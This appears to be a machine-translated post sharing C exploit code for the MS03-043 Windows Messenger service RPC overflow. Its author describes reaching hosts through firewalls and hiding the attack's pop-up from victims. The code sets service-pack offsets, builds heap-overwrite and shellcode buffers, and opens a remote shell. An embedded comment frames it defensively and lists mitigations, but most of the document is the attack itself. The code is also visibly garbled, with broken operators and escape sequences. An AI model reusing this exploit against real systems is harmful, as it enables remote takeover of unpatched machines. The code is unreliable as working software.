DCOM before the removal vulnerability MS03-043 exploitation code
Because it can go through UDP 135 and a dynamic UDP port above 1024, many machines on APT's daily network that sat behind a firewall and a BlackICE whitelist were also easy to handle. It is the MSG vulnerability I often mention. After realizing the importance of RPC, a series of RPC results were produced. Hot RPC research in China basically started only after DCOM was released. It is a pity that a series of RPC library vulnerabilities exist!
When I came back to look, I found that the code had been modified many times; I remember that I did not find the PEB pointer version. In this version the message box will pop up. The fix for the pop-up message box, which would not let people notice there is an attack, requires SP confirmation to overwrite the function pointer and a 4-byte shellcode jump. This one just overwrites a variable, controlling it to prevent the message box from being shown. There are also some length-handling problems, which pig is expected to solve.
/*
 * Review note (defensive context): this is the MS03-043 (Messenger service)
 * proof-of-concept described in the text above, pasted with its formatting
 * collapsed and several tokens garbled by translation. It is kept verbatim
 * below and is deliberately not reconstructed here.
 *
 * sendoverpack(): starts three threads running sendoverstr(), one every
 * 6000 ms, and afterwards parks in an endless Sleep() loop behind an
 * `overok` check.
 *
 * sendoverstr(): derives `sys_ver_num` from the global `version` string
 * ("sp0".."sp3", "winxp"), selects hard-coded per-service-pack offsets
 * (RVAWIN2K / RVAWINXP plus fixed constants) into `funadd` and
 * `jmpshelladd`, fills two LocalAlloc'd buffers with NOPCODE and the
 * GetShellcode() output, and hands them to the RPC stub HelloProc().
 * Its `overok` state machine retries the hook packet when the first call
 * does not return OKNUM; the author's own trailing comment records that
 * oversized RPC calls over UDP fail on the second attempt in the same
 * process. `status` and `buff` are declared but never used in what is
 * visible here.
 *
 * Mitigation for hosts that could still be exposed: install the MS03-043
 * update, disable the Messenger service, and block inbound UDP/TCP 135 and
 * the dynamic RPC port range at the perimeter. Repeated Messenger RPC calls
 * carrying long, NOP-padded string arguments are the observable pattern for
 * detection.
 */
Void sendoverpack () {int I, j; for (I = 0; I <3; ++ I) {CreateThread (NULL, 0, (LPTHREAD_START_ROUTINE) sendoverstr, 0, 0, & j); Sleep (6000) ;}// sendoverpack (); if (overok = 3) {while (1) Sleep (0x7fffffff) ;}} void sendoverstr () {/** call the remote process */int I, j; RPC_STATUS status; char buff [0x100]; // char buffer [BUFFSIZE]; char * buffer = LocalAlloc (LMEM_ZEROINIT, BUFFSIZE + 2); char * buffer2 = LocalAlloc (LMEM_ZEROINIT, BUFFSIZE + 2); Int funadd = RVAWIN2K + 0x8310; int jmpshelladd = RVAWIN2K + 0x8298; memset (buffer, NOPCODE, SENDBUFFLEN); if (sys_ver_num> 4 | sys_ver_num <0) sys_ver_num = 4; sys_ver_num = 10; if (strcmp (version, "sp0") = 0) sys_ver_num = 0; if (strcmp (version, "sp1") = 0) sys_ver_num = 1; if (strcmp (version, "sp2") = 0) sys_ver_num = 2; if (strcmp (version, "sp3") = 0) sys_ver_num = 3; if (strcmp (version, "winxp") = 0) sys_ver_num = 10; if (sys_ver_num = 10) {funadd = RVAWINXP + 0x8238; jmpshelladd = RVAWINXP + 0x8560;} if (sys_ver_num = 3) {// win2k + sp3 funadd = RVAWIN2K + 0x8078; jmpshelladd = RVAWIN2K + 0x811c;} if (sys_ver_num = 2) {// win2k + sp2 funadd = RVAWIN2K + 0x8330; jmpshelladd = RVAWIN2K + 0x82b8;} if (sys_ver_num = 1) {// win2k + sp1 funadd = RVAWIN2K + 0x8330; jmpshelladd = RVAWIN2K + 0x82b8;} if (sys_ver_num = 0) {// win2k + sp0 funadd = RVAWIN2K + 0x8310; jmpshelladd = R VAWIN2K + 0x8298;} if (sys_ver_num <= 4) {I = 0x0234*8; memcpy (buffer + ADDRESS, "\ x02 \ x01 \ x34 \ x02 \ x01 \ x01 \ x02", 7); // non-idle memory block // memcpy (buffer + ADDRESS + 0x8, "\ x80 \ xf2 \ xfd \ x7f", 4); // fun-4 // memcpy (buffer + ADDRESS + 0x0c, "\ xa8 \ x81 \ xec \ x74 ", 4); // shelladd memcpy (buffer + ADDRESS-I, "\ x30 \ x01 \ x02 \ x01 \ x01 \ x20 \ x02 \ x02", 8 ); // idle memory block * (int *) (buffer + ADDRESS-I + 0x8) = funadd-4; * (int *) (buffer + ADDRESS-I + 0x0c) = jmpshelladd; // Shelladd // memcpy (buffer + ADDRESS-I + 0x8, "\ xa8 \ x81 \ xec \ x74", 4 ); // fun-4 // memcpy (buffer + ADDRESS-I + 0x0c, 
"\ xd9 \ x8b \ xec \ x74", 4 ); // shelladd j = (0x130 + 0x102-0x234) * 8; memcpy (buffer + ADDRESS + j, "\ x02 \ x01 \ x02 \ x02 \ x01 \ x20 \ x02 \ x02", 8); // idle memory block * (int *) (buffer + ADDRESS + j + 0x8) = 0x0856ff61; * (int *) (buffer + ADDRESS + j + 0x0c) = jmpshelladd; // shelladd // memcpy (buffer + ADDRESS + j + 0x08, "\ x90 \ x90 \ x68 \ xff", 4); // m Emcpy (buffer + ADDRESS + j + 0x0c, "\ xd9 \ x8b \ xec \ x74", 4); I = i-0x10 + j; I = I/2; memset (buffer + ADDRESS + J-2 * I, 0x14, I); strcpy (buffer + ADDRESS + j-I, buffer + ADDRESS + j ); /* I = strlen (buffer + ADDRESS + 0x20)/2; memset (buffer + ADDRESS + 0x20, 0x14, I ); memset (buffer + ADDRESS + 0x20 + strlen (buffer + ADDRESS + 0x20)-I, x 10); j = ADDRESS-j-0x100; I = j/2; memset (buffer + ADDRESS-2 * I, 0x14, I); strcpy (buffer + ADDRESS-I, buffer + ADDRESS); * // * Service Replace 0x14 with 0x0d0x0a. To reduce the overflow String Length, replace the free space with 0x14 */} memset (buffer2, NOPCODE, BUFFSIZE ); I = GetShellcode (buffer2 + 0x10); j = 0x0eeb; for (j = 0x0eeb; j <I; j + = 0x100) {} memset (buffer2 + I, NOPCODE, BUFFSIZE-I); memset (buffer2 + J-1, x 10); I = strlen (buffer2); // memset (buffer + 0x300-1, x 10 ); // len = 0x0ceb 0xeb 0x0c jmp to shellcode // eb 0c 00 00 00 00 00 eb 0c 00 00 t 00 90 90 if (overok = 0) {outprintf ("\ r \ nsend hoo K test packet! \ R \ n "); j = HelloProc (buffer2," testest "," 0 "); // buffer); overok = 1; outprintf ("\ r \ npacket send OK! Return 0x % x \ r \ n ", j); if (j! = OKNUM) j = HelloProc ("t", "testest", buffer); // send over packet if (j = OKNUM) {overok = 3; shellcmd ();} else {overok = 0; j = HelloProc (buffer2, "testest", "1"); // send hook packet} ExitThread (0 ); /* test shows that when RPC uses UDP for communication, if the packet length is too long, the first time the call succeeds, and the second RPC call fails. however, restarting the program can be successfully sent once again. 
it seems that the client of RPC communication has a problem with UDP communication. */}